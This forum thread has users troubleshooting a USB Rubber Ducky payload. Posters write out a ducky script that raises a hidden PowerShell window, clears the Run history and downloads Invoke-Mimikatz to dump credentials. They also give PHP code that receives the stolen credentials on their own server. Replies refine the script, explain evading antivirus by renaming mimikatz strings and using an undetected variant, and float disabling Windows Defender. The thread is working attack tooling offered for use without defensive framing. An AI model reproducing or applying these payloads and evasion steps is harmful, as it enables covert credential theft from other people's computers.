Jump to content

Recommended Posts

Posted

Hello everyone.

For a few days I try to run my first PAYLOAD, following the purchase of the USB Rubber Ducky ... but it doesn't work ;-(

In my inject.bin file, I have this:

 

DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 2000
ALT y
DELAY 1000
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)"&exit
ENTER

NB : I can give the exact url of my hosting by private message

I transferred by filezilla on my server both files: im.ps1 (download here : https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 <-- I haven't change) and rx.php

In rx.php I have this code :

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input"));
?>


When I insert the USB key, the script executes apparently without error... But no file is created on my hosting ;-(

I reread the whole script ... but I do not understand why it doesn't work ;-(

Can you help me ?

Thank's all ;-)

 

NB : I'm living in FRANCE/Paris and in Normandy (Cabourg). If you go through there, I can offer you a drink ;-)

 

Posted
5 hours ago, mavieprivee said:

In addition to my previous message:

I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds

With no data ;-(

1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script. 

2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz.

IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)
Posted
On 1/14/2017 at 3:08 PM, henna3 said:

I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as an non-active window. So, when alt+y is being pressed its not being pressed in the uac prompt window. Is there any way to fix this issue/workaround?

Amazing twin duck payload!

Thanks.

did you find a solution? i am running into the same thing and well even if i choose to run the UAC i am not getting a file so 

Posted

well looks like win10 is now blocking scripts it could vie becuse i am running win 10 enterprise

 

PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Ou
t-File '%duck%\%computername%_creds.txt';"
.\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information,
see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module  ...
+ ~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess 

Posted
6 hours ago, shr00mie said:

1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script. 

2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz.


IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

 

Hello shr00mie,

When I run just the line

IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

in a .ps1 file, I obtain a file on my server with this :

 


  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(powershell) # exit
Bye!

 

;-(

Posted
On 13/2/2017 at 3:58 AM, shr00mie said:

1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script. 

2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz.


IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

 

His script is not out of order, it is in fact exactly the new version introduced in this very useful post from the OP.
The history cleaning is performed only when the powershell process shuts down/exits. ;)

 

On 13/2/2017 at 6:49 AM, L07TB0Y said:

well looks like win10 is now blocking scripts it could vie becuse i am running win 10 enterprise

 

PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Ou
t-File '%duck%\%computername%_creds.txt';"
.\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information,
see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module  ...
+ ~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess 

For your info, many AV, included Windows Defender, are now able to detect the invoke-mimikatz.ps1 script.
But never trust your AV too much, as there is always an easy workaround ;)
Check this post for detailed instructions:
http://www.blackhillsinfosec.com/?p=5555

Basically you just need to modify the original invoke-mimikatz.ps1 script, substituting every "mimikatz" word with another one (mimidogz?).

I've also found an alternate and lighter version (400K vs 2.5Mb) of the original invoke-mimikatz script, that is not detected as well: but with this one you need to type the commands interactively: no --DumpCreds switch.

Here:
https://gist.github.com/subTee/0a3b56ac743e8d1eeab0

I've already tested both and they work like a charme, until a future 'cheap' AV update... ;)

Posted

I forgot to mention also that the minimum columns number for a powershell window is now 20. No more 18, or it will not shrink.

P.S.
Is there a way to edit a post after posting it?! I cannot find it.

Posted

Hello everybody,
you can get my modified invoke-mimikatz.ps1 (renamed md.ps1) from this link:

https://goo.gl/FoLS0P

While this is the Duck script:

DELAY 1000
GUI r
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 500
REM ALT y
LEFTARROW
DELAY 300
ENTER
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://your.domain/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('https://your.domain/rx.php', $o)"&exit
ENTER

And this is the rx.php file content, you need to put on your server to receive the credentials:

<?php
date_default_timezone_set('Europe/Rome');
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".txt";
file_put_contents($file, file_get_contents("php://input"));
?>
  • 4 weeks later...
Posted

Hello Sh4d0wm4n,

Your script is great, thank you ! But, unfortunately, the link with your modified invoke-mimikatz.ps1 (renamed md.ps1), isn't available anymore... Could you, please, reupload it again ? Thanks a lot !

  • 3 weeks later...
Posted

I am getting the following error. The web server does create the file, however the contents are blank, here is what is found when running the command.. anyone else run into this?

 

C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
New-Object :
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:85
+ ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
+                                                                            ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

 


C:\WINDOWS\system32>

Posted
1 hour ago, MS08067 said:

I am getting the following error. The web server does create the file, however the contents are blank, here is what is found when running the command.. anyone else run into this?

 

C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
New-Object :
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:85
+ ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
+                                                                            ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

 


C:\WINDOWS\system32>

I figured out whats going on here. Windows Defender was catching it and removing it before It was able to be ran. Once I disabled it, it then worked just fine. Now the question is, should we automate turning windows defender off as a service (since we are administrator) or do we try and obfuscate the file so its not detected ?

  • 5 years later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...